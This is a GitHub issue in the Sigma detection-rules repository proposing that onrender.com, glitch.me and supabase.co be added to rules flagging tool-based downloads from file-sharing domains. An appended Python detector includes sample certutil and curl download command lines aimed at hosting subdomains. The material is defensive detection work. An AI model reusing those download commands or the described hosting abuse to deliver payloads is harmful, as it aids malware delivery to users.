Adding new hosting sites to downloading rules
omaramin17 opened this issue · 3 comments
Description of the Idea of the Rule:
It has been observed, from the recently published Microsoft blog, that multiple hosting sites such as onrender.com, glitch.me, and supabase.co are used for malware delivery, where they create a unique subdomain, such as test-project.onrender.com, and connect the project to their GitHub Pages to host malicious files, making these accessible from such subdomains.
-> An example from the onrender dashboard, where I created a project called threat-test.onrender.com and connected it to my GitHub page repository.
Adding these sites:
- onrender.com
- glitch.me
- supabase.co
to the following rules:
- win_bits_client_new_transfer_via_file_sharing_domains.yml
- proc_creation_win_bitsadmin_download_file_sharing_domains.yml
- create_stream_hash_file_sharing_domains_download_susp_extension.yml
- proc_creation_win_certutil_download_file_sharing_domains.yml
- proc_creation_win_wget_download_susp_file_sharing_domains
- create_stream_hash_file_sharing_domains_download_unusual_extension
- win_appxdeployment_server_susp_domains.yml
- proc_creation_win_curl_download_susp_file_sharing_domains.yml
- net_connection_win_binary_susp_com.yml
Public References
Welcome @omaramin17 👋
It looks like this is your first issue on the Sigma rules repository!
The following repository accepts issues related to false positives or 'rule ideas'.
If you're reporting an issue related to the pySigma library please consider submitting it here
If you're reporting an issue related to the deprecated sigmac library please consider submitting it here
Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃
Thanks @omaramin17
I will get the rules updated as soon as I can.
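
As an added illustration, not part of the issue thread or of the Sigma project's rules: a small Python check that applies the proposal to constructed process-creation events, flagging download tools whose command line points at a subdomain of the three hosting sites. The event field names, the tool list and the sample events are assumptions made for the example, and it matches on the parsed hostname rather than on a substring so that look-alike hosts are not flagged.

```python
import re
from urllib.parse import urlsplit

# The three hosting domains proposed in the issue.
HOSTING_DOMAINS = ("onrender.com", "glitch.me", "supabase.co")
# Download-capable binaries, taken from the rule file names listed in the issue.
DOWNLOAD_TOOLS = ("bitsadmin.exe", "certutil.exe", "curl.exe", "wget.exe")

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def hosting_domain_for(host):
    """Return the hosting domain that `host` equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for domain in HOSTING_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def match_event(event):
    """Return (tool, host, domain) for a process-creation event that downloads
    from one of the hosting domains, or None when the event does not match."""
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in DOWNLOAD_TOOLS:
        return None
    for url in URL_RE.findall(event.get("CommandLine", "")):
        host = urlsplit(url).hostname or ""
        domain = hosting_domain_for(host)
        if domain:
            return image, host, domain
    return None


# Constructed sample events (assumed Sysmon-style field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f https://threat-test.onrender.com/a.bin a.bin"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -o p.zip https://example-proj.supabase.co/storage/p.zip"},
    # Look-alike host: a plain substring match on "glitch.me" would flag this one.
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -O https://glitch.me.example.org/readme.txt"},
    # Hosting domain present, but the process is not one of the download tools.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad https://demo.glitch.me/notes.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(match_event(ev), "<-", ev["CommandLine"])
```
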